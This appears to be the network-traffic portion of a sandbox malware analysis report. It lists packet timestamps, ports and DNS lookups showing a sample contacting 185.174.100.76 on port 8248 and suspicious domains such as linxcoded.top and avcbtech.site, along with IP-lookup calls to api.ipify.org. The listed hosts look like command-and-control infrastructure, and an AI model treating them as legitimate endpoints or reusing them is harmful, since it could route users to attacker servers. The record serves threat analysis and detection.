Mar 24, 2025 10:15:09.772284031 CET	443	49710	204.79.197.222	192.168.2.4
Mar 24, 2025 10:15:10.777345896 CET	49785	8248	192.168.2.4	185.174.100.76
Mar 24, 2025 10:15:10.936141968 CET	8248	49785	185.174.100.76	192.168.2.4
Mar 24, 2025 10:15:24.167707920 CET	49763	8248	192.168.2.4	185.174.100.76
Mar 24, 2025 10:15:24.325244904 CET	8248	49763	185.174.100.76	192.168.2.4
Mar 24, 2025 10:15:35.891244888 CET	49799	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:15:35.891314030 CET	443	49799	104.168.138.190	192.168.2.4
Mar 24, 2025 10:15:35.891374111 CET	49799	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:15:35.891611099 CET	49799	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:15:35.891628027 CET	443	49799	104.168.138.190	192.168.2.4
Mar 24, 2025 10:15:35.893035889 CET	49800	8248	192.168.2.4	185.174.100.76
Mar 24, 2025 10:15:36.046272039 CET	8248	49800	185.174.100.76	192.168.2.4
Mar 24, 2025 10:15:36.046380997 CET	49800	8248	192.168.2.4	185.174.100.76
Mar 24, 2025 10:15:36.046613932 CET	49800	8248	192.168.2.4	185.174.100.76
Mar 24, 2025 10:15:36.197863102 CET	8248	49800	185.174.100.76	192.168.2.4
Mar 24, 2025 10:15:36.198214054 CET	49800	8248	192.168.2.4	185.174.100.76
Mar 24, 2025 10:15:36.198605061 CET	49800	8248	192.168.2.4	185.174.100.76
Mar 24, 2025 10:15:36.202568054 CET	443	49799	104.168.138.190	192.168.2.4
Mar 24, 2025 10:15:36.202836990 CET	49799	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:15:36.202908993 CET	443	49799	104.168.138.190	192.168.2.4
Mar 24, 2025 10:15:36.203020096 CET	49799	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:15:36.203035116 CET	443	49799	104.168.138.190	192.168.2.4
Mar 24, 2025 10:15:36.349843979 CET	8248	49800	185.174.100.76	192.168.2.4
Mar 24, 2025 10:15:36.349900007 CET	8248	49800	185.174.100.76	192.168.2.4
Mar 24, 2025 10:15:36.357635975 CET	49801	443	192.168.2.4	104.26.12.205
Mar 24, 2025 10:15:36.357681990 CET	443	49801	104.26.12.205	192.168.2.4
Mar 24, 2025 10:15:36.357742071 CET	49801	443	192.168.2.4	104.26.12.205
Mar 24, 2025 10:15:36.358058929 CET	49801	443	192.168.2.4	104.26.12.205
Mar 24, 2025 10:15:36.358077049 CET	443	49801	104.26.12.205	192.168.2.4
Mar 24, 2025 10:15:36.405298948 CET	49800	8248	192.168.2.4	185.174.100.76
Mar 24, 2025 10:15:36.566531897 CET	443	49801	104.26.12.205	192.168.2.4
Mar 24, 2025 10:15:36.566890955 CET	49801	443	192.168.2.4	104.26.12.205
Mar 24, 2025 10:15:36.566921949 CET	443	49801	104.26.12.205	192.168.2.4
Mar 24, 2025 10:15:36.567094088 CET	49801	443	192.168.2.4	104.26.12.205
Mar 24, 2025 10:15:36.567101955 CET	443	49801	104.26.12.205	192.168.2.4
Mar 24, 2025 10:15:36.757342100 CET	443	49799	104.168.138.190	192.168.2.4
Mar 24, 2025 10:15:36.757775068 CET	443	49799	104.168.138.190	192.168.2.4
Mar 24, 2025 10:15:36.757863998 CET	49799	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:15:36.758105040 CET	49799	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:15:36.758152962 CET	443	49799	104.168.138.190	192.168.2.4
Mar 24, 2025 10:15:36.775702000 CET	49802	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:15:36.775803089 CET	443	49802	104.168.138.190	192.168.2.4
Mar 24, 2025 10:15:36.775887012 CET	49802	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:15:36.776123047 CET	49802	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:15:36.776163101 CET	443	49802	104.168.138.190	192.168.2.4
Mar 24, 2025 10:15:36.822910070 CET	443	49801	104.26.12.205	192.168.2.4
Mar 24, 2025 10:15:36.823064089 CET	443	49801	104.26.12.205	192.168.2.4
Mar 24, 2025 10:15:36.823132992 CET	49801	443	192.168.2.4	104.26.12.205
Mar 24, 2025 10:15:36.823770046 CET	49801	443	192.168.2.4	104.26.12.205
Mar 24, 2025 10:15:36.823788881 CET	443	49801	104.26.12.205	192.168.2.4
Mar 24, 2025 10:15:36.824771881 CET	49800	8248	192.168.2.4	185.174.100.76
Mar 24, 2025 10:15:36.827732086 CET	49803	443	192.168.2.4	104.26.13.205
Mar 24, 2025 10:15:36.827754021 CET	443	49803	104.26.13.205	192.168.2.4
Mar 24, 2025 10:15:36.827817917 CET	49803	443	192.168.2.4	104.26.13.205
Mar 24, 2025 10:15:36.828118086 CET	49803	443	192.168.2.4	104.26.13.205
Mar 24, 2025 10:15:36.828130960 CET	443	49803	104.26.13.205	192.168.2.4
Mar 24, 2025 10:15:37.019382954 CET	8248	49800	185.174.100.76	192.168.2.4
Mar 24, 2025 10:15:37.048244953 CET	443	49803	104.26.13.205	192.168.2.4
Mar 24, 2025 10:15:37.048571110 CET	49803	443	192.168.2.4	104.26.13.205
Mar 24, 2025 10:15:37.048590899 CET	443	49803	104.26.13.205	192.168.2.4
Mar 24, 2025 10:15:37.048738956 CET	49803	443	192.168.2.4	104.26.13.205
Mar 24, 2025 10:15:37.048744917 CET	443	49803	104.26.13.205	192.168.2.4
Mar 24, 2025 10:15:37.084940910 CET	443	49802	104.168.138.190	192.168.2.4
Mar 24, 2025 10:15:37.085180044 CET	49802	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:15:37.085226059 CET	443	49802	104.168.138.190	192.168.2.4
Mar 24, 2025 10:15:37.085293055 CET	49802	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:15:37.085308075 CET	443	49802	104.168.138.190	192.168.2.4
Mar 24, 2025 10:15:37.247030020 CET	49750	8248	192.168.2.4	185.174.100.76
Mar 24, 2025 10:15:37.298996925 CET	443	49803	104.26.13.205	192.168.2.4
Mar 24, 2025 10:15:37.299170971 CET	443	49803	104.26.13.205	192.168.2.4
Mar 24, 2025 10:15:37.299247026 CET	49803	443	192.168.2.4	104.26.13.205
Mar 24, 2025 10:15:37.300369978 CET	49803	443	192.168.2.4	104.26.13.205
Mar 24, 2025 10:15:37.300394058 CET	443	49803	104.26.13.205	192.168.2.4
Mar 24, 2025 10:15:37.399939060 CET	8248	49750	185.174.100.76	192.168.2.4
Mar 24, 2025 10:15:37.566817999 CET	443	49802	104.168.138.190	192.168.2.4
Mar 24, 2025 10:15:37.566962004 CET	443	49802	104.168.138.190	192.168.2.4
Mar 24, 2025 10:15:37.567039013 CET	49802	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:15:37.567754030 CET	49802	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:15:37.567801952 CET	443	49802	104.168.138.190	192.168.2.4
Mar 24, 2025 10:15:45.418699980 CET	49753	8248	192.168.2.4	185.174.100.76
Mar 24, 2025 10:15:45.570799112 CET	8248	49753	185.174.100.76	192.168.2.4
Mar 24, 2025 10:15:47.156064034 CET	49777	8248	192.168.2.4	185.174.100.76
Mar 24, 2025 10:15:47.308662891 CET	8248	49777	185.174.100.76	192.168.2.4
Mar 24, 2025 10:15:51.340274096 CET	49795	8248	192.168.2.4	185.174.100.76
Mar 24, 2025 10:15:51.493515015 CET	8248	49795	185.174.100.76	192.168.2.4
Mar 24, 2025 10:15:55.950382948 CET	49785	8248	192.168.2.4	185.174.100.76
Mar 24, 2025 10:15:56.111114025 CET	8248	49785	185.174.100.76	192.168.2.4
Mar 24, 2025 10:16:06.329102993 CET	49804	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:16:06.329216957 CET	443	49804	104.168.138.190	192.168.2.4
Mar 24, 2025 10:16:06.329304934 CET	49804	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:16:06.330344915 CET	49805	8248	192.168.2.4	185.174.100.76
Mar 24, 2025 10:16:06.330507040 CET	49804	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:16:06.330543041 CET	443	49804	104.168.138.190	192.168.2.4
Mar 24, 2025 10:16:06.490731001 CET	8248	49805	185.174.100.76	192.168.2.4
Mar 24, 2025 10:16:06.490840912 CET	49805	8248	192.168.2.4	185.174.100.76
Mar 24, 2025 10:16:06.491138935 CET	49805	8248	192.168.2.4	185.174.100.76
Mar 24, 2025 10:16:06.639806986 CET	443	49804	104.168.138.190	192.168.2.4
Mar 24, 2025 10:16:06.640137911 CET	49804	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:16:06.640191078 CET	443	49804	104.168.138.190	192.168.2.4
Mar 24, 2025 10:16:06.640296936 CET	49804	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:16:06.640326023 CET	443	49804	104.168.138.190	192.168.2.4
Mar 24, 2025 10:16:06.655024052 CET	8248	49805	185.174.100.76	192.168.2.4
Mar 24, 2025 10:16:06.655230045 CET	49805	8248	192.168.2.4	185.174.100.76
Mar 24, 2025 10:16:06.655436993 CET	49805	8248	192.168.2.4	185.174.100.76
Mar 24, 2025 10:16:06.817213058 CET	8248	49805	185.174.100.76	192.168.2.4
Mar 24, 2025 10:16:06.817347050 CET	8248	49805	185.174.100.76	192.168.2.4
Mar 24, 2025 10:16:06.820473909 CET	49806	443	192.168.2.4	104.26.12.205
Mar 24, 2025 10:16:06.820573092 CET	443	49806	104.26.12.205	192.168.2.4
Mar 24, 2025 10:16:06.820693016 CET	49806	443	192.168.2.4	104.26.12.205
Mar 24, 2025 10:16:06.820810080 CET	49806	443	192.168.2.4	104.26.12.205
Mar 24, 2025 10:16:06.820833921 CET	443	49806	104.26.12.205	192.168.2.4
Mar 24, 2025 10:16:06.870279074 CET	49805	8248	192.168.2.4	185.174.100.76
Mar 24, 2025 10:16:07.039232969 CET	443	49806	104.26.12.205	192.168.2.4
Mar 24, 2025 10:16:07.039519072 CET	49806	443	192.168.2.4	104.26.12.205
Mar 24, 2025 10:16:07.039573908 CET	443	49806	104.26.12.205	192.168.2.4
Mar 24, 2025 10:16:07.039676905 CET	49806	443	192.168.2.4	104.26.12.205
Mar 24, 2025 10:16:07.039690018 CET	443	49806	104.26.12.205	192.168.2.4
Mar 24, 2025 10:16:07.139914036 CET	443	49804	104.168.138.190	192.168.2.4
Mar 24, 2025 10:16:07.139992952 CET	443	49804	104.168.138.190	192.168.2.4
Mar 24, 2025 10:16:07.140147924 CET	49804	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:16:07.140546083 CET	49804	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:16:07.140593052 CET	443	49804	104.168.138.190	192.168.2.4
Mar 24, 2025 10:16:07.143585920 CET	49807	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:16:07.143623114 CET	443	49807	104.168.138.190	192.168.2.4
Mar 24, 2025 10:16:07.143697977 CET	49807	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:16:07.143843889 CET	49807	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:16:07.143855095 CET	443	49807	104.168.138.190	192.168.2.4
Mar 24, 2025 10:16:07.296897888 CET	443	49806	104.26.12.205	192.168.2.4
Mar 24, 2025 10:16:07.297064066 CET	443	49806	104.26.12.205	192.168.2.4
Mar 24, 2025 10:16:07.297151089 CET	49806	443	192.168.2.4	104.26.12.205
Mar 24, 2025 10:16:07.297971964 CET	49806	443	192.168.2.4	104.26.12.205
Mar 24, 2025 10:16:07.298015118 CET	443	49806	104.26.12.205	192.168.2.4
Mar 24, 2025 10:16:07.299004078 CET	49805	8248	192.168.2.4	185.174.100.76
Mar 24, 2025 10:16:07.301134109 CET	49808	443	192.168.2.4	104.26.13.205
Mar 24, 2025 10:16:07.301229954 CET	443	49808	104.26.13.205	192.168.2.4
Mar 24, 2025 10:16:07.301318884 CET	49808	443	192.168.2.4	104.26.13.205
Mar 24, 2025 10:16:07.301487923 CET	49808	443	192.168.2.4	104.26.13.205
Mar 24, 2025 10:16:07.301513910 CET	443	49808	104.26.13.205	192.168.2.4
Mar 24, 2025 10:16:07.458148956 CET	443	49807	104.168.138.190	192.168.2.4
Mar 24, 2025 10:16:07.458451986 CET	49807	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:16:07.458475113 CET	443	49807	104.168.138.190	192.168.2.4
Mar 24, 2025 10:16:07.458616972 CET	49807	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:16:07.458621979 CET	443	49807	104.168.138.190	192.168.2.4
Mar 24, 2025 10:16:07.504452944 CET	8248	49805	185.174.100.76	192.168.2.4
Mar 24, 2025 10:16:07.517412901 CET	443	49808	104.26.13.205	192.168.2.4
Mar 24, 2025 10:16:07.517659903 CET	49808	443	192.168.2.4	104.26.13.205
Mar 24, 2025 10:16:07.517697096 CET	443	49808	104.26.13.205	192.168.2.4
Mar 24, 2025 10:16:07.517811060 CET	49808	443	192.168.2.4	104.26.13.205
Mar 24, 2025 10:16:07.517824888 CET	443	49808	104.26.13.205	192.168.2.4
Mar 24, 2025 10:16:07.778351068 CET	443	49808	104.26.13.205	192.168.2.4
Mar 24, 2025 10:16:07.778515100 CET	443	49808	104.26.13.205	192.168.2.4
Mar 24, 2025 10:16:07.778606892 CET	49808	443	192.168.2.4	104.26.13.205
Mar 24, 2025 10:16:07.794081926 CET	49808	443	192.168.2.4	104.26.13.205
Mar 24, 2025 10:16:07.794123888 CET	443	49808	104.26.13.205	192.168.2.4
Mar 24, 2025 10:16:07.950144053 CET	443	49807	104.168.138.190	192.168.2.4
Mar 24, 2025 10:16:07.950225115 CET	443	49807	104.168.138.190	192.168.2.4
Mar 24, 2025 10:16:07.950301886 CET	49807	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:16:07.950962067 CET	49807	443	192.168.2.4	104.168.138.190
Mar 24, 2025 10:16:07.950980902 CET	443	49807	104.168.138.190	192.168.2.4
Mar 24, 2025 10:16:09.339998007 CET	49763	8248	192.168.2.4	185.174.100.76
Mar 24, 2025 10:16:09.490823984 CET	8248	49763	185.174.100.76	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 24, 2025 10:12:51.937731028 CET	53	61104	1.1.1.1	192.168.2.4
Mar 24, 2025 10:12:51.939364910 CET	53	57736	1.1.1.1	192.168.2.4
Mar 24, 2025 10:12:52.497526884 CET	53	51065	1.1.1.1	192.168.2.4
Mar 24, 2025 10:12:52.664153099 CET	53	59602	1.1.1.1	192.168.2.4
Mar 24, 2025 10:12:55.247659922 CET	60079	53	192.168.2.4	1.1.1.1
Mar 24, 2025 10:12:55.247807026 CET	59498	53	192.168.2.4	1.1.1.1
Mar 24, 2025 10:12:55.352121115 CET	53	60079	1.1.1.1	192.168.2.4
Mar 24, 2025 10:12:55.355103970 CET	53	59498	1.1.1.1	192.168.2.4
Mar 24, 2025 10:12:57.267642975 CET	58977	53	192.168.2.4	1.1.1.1
Mar 24, 2025 10:12:57.267923117 CET	58560	53	192.168.2.4	1.1.1.1
Mar 24, 2025 10:12:57.473644018 CET	53	58977	1.1.1.1	192.168.2.4
Mar 24, 2025 10:12:57.474591970 CET	53	58560	1.1.1.1	192.168.2.4
Mar 24, 2025 10:12:58.935364962 CET	62708	53	192.168.2.4	1.1.1.1
Mar 24, 2025 10:12:58.935645103 CET	59248	53	192.168.2.4	1.1.1.1
Mar 24, 2025 10:12:59.220519066 CET	53	62708	1.1.1.1	192.168.2.4
Mar 24, 2025 10:12:59.241576910 CET	53	59248	1.1.1.1	192.168.2.4
Mar 24, 2025 10:13:00.902862072 CET	53	54635	1.1.1.1	192.168.2.4
Mar 24, 2025 10:13:01.601006985 CET	52633	53	192.168.2.4	1.1.1.1
Mar 24, 2025 10:13:01.601596117 CET	50213	53	192.168.2.4	1.1.1.1
Mar 24, 2025 10:13:01.709640980 CET	53	52633	1.1.1.1	192.168.2.4
Mar 24, 2025 10:13:01.709855080 CET	53	50213	1.1.1.1	192.168.2.4
Mar 24, 2025 10:13:02.289815903 CET	59148	53	192.168.2.4	1.1.1.1
Mar 24, 2025 10:13:02.290030956 CET	62527	53	192.168.2.4	1.1.1.1
Mar 24, 2025 10:13:02.395376921 CET	53	62527	1.1.1.1	192.168.2.4
Mar 24, 2025 10:13:02.395939112 CET	53	59148	1.1.1.1	192.168.2.4
Mar 24, 2025 10:13:02.822396040 CET	64702	53	192.168.2.4	1.1.1.1
Mar 24, 2025 10:13:02.822601080 CET	52202	53	192.168.2.4	1.1.1.1
Mar 24, 2025 10:13:02.926821947 CET	53	64702	1.1.1.1	192.168.2.4
Mar 24, 2025 10:13:02.928926945 CET	53	52202	1.1.1.1	192.168.2.4
Mar 24, 2025 10:13:09.837173939 CET	53	54804	1.1.1.1	192.168.2.4
Mar 24, 2025 10:13:20.297545910 CET	61594	53	192.168.2.4	1.1.1.1
Mar 24, 2025 10:13:20.297799110 CET	57005	53	192.168.2.4	1.1.1.1
Mar 24, 2025 10:13:20.588032007 CET	53	61594	1.1.1.1	192.168.2.4
Mar 24, 2025 10:13:20.792201996 CET	53	57005	1.1.1.1	192.168.2.4
Mar 24, 2025 10:13:21.136162043 CET	60481	53	192.168.2.4	1.1.1.1
Mar 24, 2025 10:13:21.136471033 CET	58694	53	192.168.2.4	1.1.1.1
Mar 24, 2025 10:13:21.236720085 CET	53	58694	1.1.1.1	192.168.2.4
Mar 24, 2025 10:13:21.237385035 CET	53	60481	1.1.1.1	192.168.2.4
Mar 24, 2025 10:13:21.731443882 CET	54959	53	192.168.2.4	1.1.1.1
Mar 24, 2025 10:13:21.731658936 CET	58294	53	192.168.2.4	1.1.1.1
Mar 24, 2025 10:13:21.835058928 CET	53	54959	1.1.1.1	192.168.2.4
Mar 24, 2025 10:13:21.835333109 CET	53	58294	1.1.1.1	192.168.2.4
Mar 24, 2025 10:13:28.947266102 CET	53193	53	192.168.2.4	1.1.1.1
Mar 24, 2025 10:13:28.947551012 CET	59057	53	192.168.2.4	1.1.1.1
Mar 24, 2025 10:13:28.961555958 CET	53	53353	1.1.1.1	192.168.2.4
Mar 24, 2025 10:13:29.305103064 CET	53	59057	1.1.1.1	192.168.2.4
Mar 24, 2025 10:13:29.316355944 CET	53	53193	1.1.1.1	192.168.2.4
Mar 24, 2025 10:13:42.125505924 CET	55656	53	192.168.2.4	1.1.1.1
Mar 24, 2025 10:13:42.125708103 CET	61639	53	192.168.2.4	1.1.1.1
Mar 24, 2025 10:13:42.394448042 CET	53	55656	1.1.1.1	192.168.2.4
Mar 24, 2025 10:13:42.465986967 CET	53	61639	1.1.1.1	192.168.2.4
Mar 24, 2025 10:13:50.935632944 CET	53	49791	1.1.1.1	192.168.2.4
Mar 24, 2025 10:13:52.053544044 CET	53	59535	1.1.1.1	192.168.2.4
Mar 24, 2025 10:13:53.667651892 CET	53	52613	1.1.1.1	192.168.2.4
Mar 24, 2025 10:13:55.324793100 CET	138	138	192.168.2.4	192.168.2.255
Mar 24, 2025 10:14:21.754138947 CET	53	57126	1.1.1.1	192.168.2.4
Mar 24, 2025 10:15:06.133877993 CET	58692	53	192.168.2.4	1.1.1.1
Mar 24, 2025 10:15:06.134064913 CET	61476	53	192.168.2.4	1.1.1.1
Mar 24, 2025 10:15:06.238382101 CET	53	58692	1.1.1.1	192.168.2.4
Mar 24, 2025 10:15:06.240042925 CET	53	61476	1.1.1.1	192.168.2.4
Mar 24, 2025 10:15:06.742657900 CET	53	65445	1.1.1.1	192.168.2.4

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Mar 24, 2025 10:13:20.794008017 CET	192.168.2.4	1.1.1.1	c23e	(Port unreachable)	Destination Unreachable
Mar 24, 2025 10:13:42.466097116 CET	192.168.2.4	1.1.1.1	c236	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 24, 2025 10:12:55.247659922 CET	192.168.2.4	1.1.1.1	0xe202	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Mar 24, 2025 10:12:55.247807026 CET	192.168.2.4	1.1.1.1	0x2d6f	Standard query (0)	www.google.com	65	IN (0x0001)	false
Mar 24, 2025 10:12:57.267642975 CET	192.168.2.4	1.1.1.1	0x9832	Standard query (0)	office.avcbtech.store	A (IP address)	IN (0x0001)	false
Mar 24, 2025 10:12:57.267923117 CET	192.168.2.4	1.1.1.1	0xf74	Standard query (0)	office.avcbtech.store	65	IN (0x0001)	false
Mar 24, 2025 10:12:58.935364962 CET	192.168.2.4	1.1.1.1	0x8177	Standard query (0)	sender.linxcoded.top	A (IP address)	IN (0x0001)	false
Mar 24, 2025 10:12:58.935645103 CET	192.168.2.4	1.1.1.1	0x1fe4	Standard query (0)	sender.linxcoded.top	65	IN (0x0001)	false
Mar 24, 2025 10:13:01.601006985 CET	192.168.2.4	1.1.1.1	0x2ce5	Standard query (0)	code.jquery.com	A (IP address)	IN (0x0001)	false
Mar 24, 2025 10:13:01.601596117 CET	192.168.2.4	1.1.1.1	0x7f80	Standard query (0)	code.jquery.com	65	IN (0x0001)	false
Mar 24, 2025 10:13:02.289815903 CET	192.168.2.4	1.1.1.1	0x69b6	Standard query (0)	i.imgur.com	A (IP address)	IN (0x0001)	false
Mar 24, 2025 10:13:02.290030956 CET	192.168.2.4	1.1.1.1	0x2b45	Standard query (0)	i.imgur.com	65	IN (0x0001)	false
Mar 24, 2025 10:13:02.822396040 CET	192.168.2.4	1.1.1.1	0x11ee	Standard query (0)	i.imgur.com	A (IP address)	IN (0x0001)	false
Mar 24, 2025 10:13:02.822601080 CET	192.168.2.4	1.1.1.1	0x92aa	Standard query (0)	i.imgur.com	65	IN (0x0001)	false
Mar 24, 2025 10:13:20.297545910 CET	192.168.2.4	1.1.1.1	0xa279	Standard query (0)	server1.linxcoded.top	A (IP address)	IN (0x0001)	false
Mar 24, 2025 10:13:20.297799110 CET	192.168.2.4	1.1.1.1	0x896f	Standard query (0)	_8248._https.server1.linxcoded.top	65	IN (0x0001)	false
Mar 24, 2025 10:13:21.136162043 CET	192.168.2.4	1.1.1.1	0xba0e	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Mar 24, 2025 10:13:21.136471033 CET	192.168.2.4	1.1.1.1	0x5d2e	Standard query (0)	api.ipify.org	65	IN (0x0001)	false
Mar 24, 2025 10:13:21.731443882 CET	192.168.2.4	1.1.1.1	0xf30d	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Mar 24, 2025 10:13:21.731658936 CET	192.168.2.4	1.1.1.1	0xbcd7	Standard query (0)	api.ipify.org	65	IN (0x0001)	false
Mar 24, 2025 10:13:28.947266102 CET	192.168.2.4	1.1.1.1	0xe278	Standard query (0)	avcbtech.site	A (IP address)	IN (0x0001)	false
Mar 24, 2025 10:13:28.947551012 CET	192.168.2.4	1.1.1.1	0xa7c4	Standard query (0)	avcbtech.site	65	IN (0x0001)	false
Mar 24, 2025 10:13:42.125505924 CET	192.168.2.4	1.1.1.1	0x777e	Standard query (0)	avcbtech.site	A (IP address)	IN (0x0001)	false
Mar 24, 2025 10:13:42.125708103 CET	192.168.2.4	1.1.1.1	0xecca	Standard query (0)	avcbtech.site	65	IN (0x0001)	false
Mar 24, 2025 10:15:06.133877993 CET	192.168.2.4	1.1.1.1	0xe55b	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Mar 24, 2025 10:15:06.134064913 CET	192.168.2.4	1.1.1.1	0x5b37	Standard query (0)	api.ipify.org	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 24, 2025 10:12:55.352121115 CET	1.1.1.1	192.168.2.4	0xe202	No error (0)	www.google.com		142.251.35.164	A (IP address)	IN (0x0001)	false
Mar 24, 2025 10:12:55.355103970 CET	1.1.1.1	192.168.2.4	0x2d6f	No error (0)	www.google.com			65	IN (0x0001)	false
Mar 24, 2025 10:12:57.473644018 CET	1.1.1.1	192.168.2.4	0x9832	No error (0)	office.avcbtech.store		139.28.36.38	A (IP address)	IN (0x0001)	false
Mar 24, 2025 10:12:59.220519066 CET	1.1.1.1	192.168.2.4	0x8177	No error (0)	sender.linxcoded.top		185.174.100.20	A (IP address)	IN (0x0001)	false
Mar 24, 2025 10:13:01.709640980 CET	1.1.1.1	192.168.2.4	0x2ce5	No error (0)	code.jquery.com		151.101.66.137	A (IP address)	IN (0x0001)	false
Mar 24, 2025 10:13:01.709640980 CET	1.1.1.1	192.168.2.4	0x2ce5	No error (0)	code.jquery.com		151.101.2.137	A (IP address)	IN (0x0001)	false
Mar 24, 2025 10:13:01.709640980 CET	1.1.1.1	192.168.2.4	0x2ce5	No error (0)	code.jquery.com		151.101.130.137	A (IP address)	IN (0x0001)	false
Mar 24, 2025 10:13:01.709640980 CET	1.1.1.1	192.168.2.4	0x2ce5	No error (0)	code.jquery.com		151.101.194.137	A (IP address)	IN (0x0001)	false
Mar 24, 2025 10:13:02.395376921 CET	1.1.1.1	192.168.2.4	0x2b45	No error (0)	i.imgur.com	ipv4.imgur.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 24, 2025 10:13:02.395939112 CET	1.1.1.1	192.168.2.4	0x69b6	No error (0)	i.imgur.com	ipv4.imgur.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 24, 2025 10:13:02.395939112 CET	1.1.1.1	192.168.2.4	0x69b6	No error (0)	ipv4.imgur.map.fastly.net		199.232.192.193	A (IP address)	IN (0x0001)	false
Mar 24, 2025 10:13:02.395939112 CET	1.1.1.1	192.168.2.4	0x69b6	No error (0)	ipv4.imgur.map.fastly.net		199.232.196.193	A (IP address)	IN (0x0001)	false
Mar 24, 2025 10:13:02.396801949 CET	1.1.1.1	192.168.2.4	0xe545	No error (0)	shed.dual-low.s-part-0012.t-0009.t-msedge.net	s-part-0012.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 24, 2025 10:13:02.396801949 CET	1.1.1.1	192.168.2.4	0xe545	No error (0)	s-part-0012.t-0009.t-msedge.net		13.107.246.40	A (IP address)	IN (0x0001)	false
Mar 24, 2025 10:13:02.926821947 CET	1.1.1.1	192.168.2.4	0x11ee	No error (0)	i.imgur.com	ipv4.imgur.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 24, 2025 10:13:02.926821947 CET	1.1.1.1	192.168.2.4	0x11ee	No error (0)	ipv4.imgur.map.fastly.net		199.232.192.193	A (IP address)	IN (0x0001)	false
Mar 24, 2025 10:13:02.926821947 CET	1.1.1.1	192.168.2.4	0x11ee	No error (0)	ipv4.imgur.map.fastly.net		199.232.196.193	A (IP address)	IN (0x0001)	false
Mar 24, 2025 10:13:02.928926945 CET	1.1.1.1	192.168.2.4	0x92aa	No error (0)	i.imgur.com	ipv4.imgur.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 24, 2025 10:13:03.031006098 CET	1.1.1.1	192.168.2.4	0x49ce	No error (0)	shed.dual-low.s-part-0012.t-0009.t-msedge.net	s-part-0012.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 24, 2025 10:13:03.031006098 CET	1.1.1.1	192.168.2.4	0x49ce	No error (0)	s-part-0012.t-0009.t-msedge.net		13.107.246.40	A (IP address)	IN (0x0001)	false
Mar 24, 2025 10:13:20.588032007 CET	1.1.1.1	192.168.2.4	0xa279	No error (0)	server1.linxcoded.top		185.174.100.76	A (IP address)	IN (0x0001)	false
Mar 24, 2025 10:13:20.792201996 CET	1.1.1.1	192.168.2.4	0x896f	Name error (3)	_8248._https.server1.linxcoded.top	none	none	65	IN (0x0001)	false
Mar 24, 2025 10:13:21.236720085 CET	1.1.1.1	192.168.2.4	0x5d2e	No error (0)	api.ipify.org			65	IN (0x0001)	false
Mar 24, 2025 10:13:21.237385035 CET	1.1.1.1	192.168.2.4	0xba0e	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Mar 24, 2025 10:13:21.237385035 CET	1.1.1.1	192.168.2.4	0xba0e	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Mar 24, 2025 10:13:21.237385035 CET	1.1.1.1	192.168.2.4	0xba0e	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Mar 24, 2025 10:13:21.835058928 CET	1.1.1.1	192.168.2.4	0xf30d	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Mar 24, 2025 10:13:21.835058928 CET	1.1.1.1	192.168.2.4	0xf30d	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Mar 24, 2025 10:13:21.835058928 CET	1.1.1.1	192.168.2.4	0xf30d	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Mar 24, 2025 10:13:21.835333109 CET	1.1.1.1	192.168.2.4	0xbcd7	No error (0)	api.ipify.org			65	IN (0x0001)	false
Mar 24, 2025 10:13:29.316355944 CET	1.1.1.1	192.168.2.4	0xe278	No error (0)	avcbtech.site		104.168.138.190	A (IP address)	IN (0x0001)	false
Mar 24, 2025 10:13:42.394448042 CET	1.1.1.1	192.168.2.4	0x777e	No error (0)	avcbtech.site		104.168.138.190	A (IP address)	IN (0x0001)	false
Mar 24, 2025 10:15:06.238382101 CET	1.1.1.1	192.168.2.4	0xe55b	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
